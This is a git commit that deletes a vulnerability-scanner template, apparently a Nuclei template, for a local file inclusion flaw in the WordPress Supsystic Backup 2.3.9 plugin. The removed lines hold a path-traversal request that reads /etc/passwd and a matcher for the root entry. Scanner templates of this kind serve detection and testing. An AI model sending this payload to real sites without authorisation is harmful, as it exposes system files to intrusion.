Removed as it requires admin login

patch-1
sandeep 2021-07-13 15:28:48 +05:30
parent 0e195c4138
commit a8be22ad0a
1 changed files with 0 additions and 19 deletions

View File

@ -1,19 +0,0 @@
id: wp-supsystic-backup-lfi
info:
name: WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
author: daffainfo
severity: high
reference: https://www.exploit-db.com/exploits/49545
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body